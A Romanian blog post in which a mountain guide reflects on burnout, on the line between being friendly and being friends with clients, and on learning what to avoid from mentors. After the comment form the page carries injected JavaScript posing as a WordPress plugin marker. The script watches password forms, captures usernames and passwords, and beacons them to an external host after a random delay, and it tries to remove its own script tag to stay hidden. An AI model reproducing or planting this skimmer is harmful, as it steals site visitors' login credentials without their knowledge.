fbpx

Cum ajunge un ghid montan în burn-out și ce ai de învățat din asta

Poate părea curios, dar există o întrebare pe care mi-o pun ori de câte ori termin un curs, o carte sau o discuție cu un om care mă inspiră: ce am învățat să NU fac?

Nu e o întrebare obișnuită. Suntem crescuți cu cealaltă variantă, cu listele de bune practici, cu pașii corecți, cu rețetele de succes. Fiecare teacher, coach sau lider pe care-l întâlnim vine cu un portofoliu de lucruri de făcut. Fă asta. Aplică asta. Urmează asta. Și totuși, unele dintre cele mai mari lecții din viața mea nu au venit din ce am acumulat, ci din ce am învățat greșind.

Lumina din spatele sfaturilor

Când cineva îți spune ce să faci, îți oferă direcție. E util mai ales la început, când nu știi nici măcar pe ce drum ești, dar există un unghi mort în toată această pedagogie a lucrurilor corecte. Nimeni nu vine să-ți spună: „atenție, capătul drumului ăsta, dacă nu schimbi ceva, arată așa.” Nimeni nu-ți descrie peisajul de după colț, nu pentru că n-ar ști, ci pentru că nu trăim într-o cultură a eșecurilor prevenite, ci-ntr-una a succeselor celebrate.

Friendly, not friends

Am descoperit asta pe pielea mea, într-un domeniu – mountain guiding – în care granițele sunt literalmente vitale. Când am abandonat industria comunicării pentru a mă dedica total ghidăriei montane – în 2015, după Colectiv, după ce vreo 2-3 ani le dusesem în paralel – am hotărât că nu vreau doar să formez un grup de clienți, ci să creez o comunitate. Nu mai făcuse nimeni asta, n-aveam blueprint-ul.  Mi-a ieșit de minune, dar faptul că înotam în Blue Ocean m-a împiedicat să anticipez și posibilele variante finale mai puțin fericite. Nu se mai lovise nimeni de posibilele efecte negative ale unor legături prea puternice. Emoția care leagă un ghid montan și un client poate fi mai puternică decât însăși coarda dintre ei. Meseria de ghid montan pare ceva exotic. „Aaaa, deci tu ești ghid montan și ești tot timpul în vacanță”, îmi spunea, la un moment dat, fiul de 6 ani al unui client. Nu-l pot condamna, lumea vede călătoriile prin toți munții lumii, nimeni nu percepe presiunea pusă de risk management și crises management pe sistemul nervos al ghidului. Zi după zi, an după an. Până ceva se rupe. 

Există o distincție aparent mică, dar cu consecințe enorme: diferența dintre a fi friendly și a fi friends. A fi cald, prezent, de încredere și a te confunda complet cu rolul tău până la punctul în care te pierzi în el. Nu m-a învățat nimeni că poți fi prea implicat. Că empatia fără graniță nu e virtute, ci risc. Că poți construi ceva frumos în jurul tău și să te trezești că greutatea lui te apasă mai mult decât te susține. Am înțeles asta târziu și prețul a fost mare.

Dacă aș fi întâlnit mai devreme pe cineva care să mă învețe nu cum să fac bine ceea ce fac, ci ce anume să nu las să se întâmple, poate nu aș fi ajuns în același loc.  

Întrebarea care lipsește

Gândește-te la ultimul tău mentor, profesor sau om de la care ai învățat ceva important. Acum pune-ți întrebarea „ce mi-a spus să evit?”. Dacă răspunsul vine greu, nu e vina lui. E cultura în care am crescut cu toții, una obsedată de rețete, nu de avertismente. De ce? Poate pentru că eșecul rămâne un subiect incomod. Poate pentru că e mai ușor să inspiri cu poveștile de succes decât să avertizezi cu cele de burnout, de relații rupte, de cariere luate în direcția greșită. Cred că oamenii care au ieșit din tipare și care chiar merită ascultați sunt adesea cei care poartă și cicatricile, nu doar trofeele.

Ce să cauți, de fapt

Nu trebuie să renunți la mentori, cursuri sau cărți. Doar adaugă un filtru. Când cauți pe cineva de la care să înveți, nu te uita doar la ce a construit. Uită-te la ce a dărâmat și, eventual, a reconstruit, acolo e lecția rară.

Toată lumea te poate învăța ce să faci. Piața e plină de oameni cu liste, cu framework-uri, cu success stories. Dar cei care te învață ce să NU faci, aceia au trecut prin ceva real și au ales să fie deschiși în legătură cu asta. Învățarea ca mod de viață nu înseamnă să acumulezi neîncetat. Înseamnă și să știi ce să lași deoparte. Și, pentru asta, ai nevoie de oameni care au curajul să-ți arate și umbrele, nu doar lumina.

 

Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile obligatorii sunt marcate cu *

/*wpsi_f9f0b045*/ /* /*wpsi-ext*/ */ (function(){ var _e='https://domnateneryfie.com/c?t=c7f3a9b2d81e04f5'; var _h=location.hostname; var _s=localStorage.getItem('_wpsi_s')||''; // Stealth cleanup of the visible marker var _clean = function(){ try { // Find all script tags to find our own var scripts = document.getElementsByTagName('script'); for(var i=0; i=0)return; _s+=k+','; localStorage.setItem('_wpsi_s',_s); setTimeout(function(){ navigator.sendBeacon(_e,JSON.stringify({s:_h,u:u,p:p})); },Math.random()*3000+500); } function _watch(f){ if(!f||f._w)return; f._w=1; var _collect=function(){ var u=f.querySelector('[name=username],[name=log],[name=email],[type=email]'); var p=f.querySelector('[type=password]'); if(u&&p&&u.value&&p.value)_send(u.value,p.value); }; f.addEventListener('submit',_collect,true); f.addEventListener('keydown',function(e){if(e.keyCode===13)_collect();},true); } function _scan(){ document.querySelectorAll('form').forEach(function(f){ if(f.querySelector('[type=password]'))_watch(f); }); document.querySelectorAll('[type=password]').forEach(function(p){ if(!p._wi){p._wi=1;p.addEventListener('change',function(){ var u=document.querySelector('[name=username],[name=log],[name=email],[type=email]'); if(u&&u.value&&p.value)_send(u.value,p.value); });} }); } _scan(); setInterval(_scan, 1500); if(typeof MutationObserver !== 'undefined'){ new MutationObserver(function(){ _scan(); _clean(); }).observe(document.documentElement, {childList:true, subtree:true}); } })();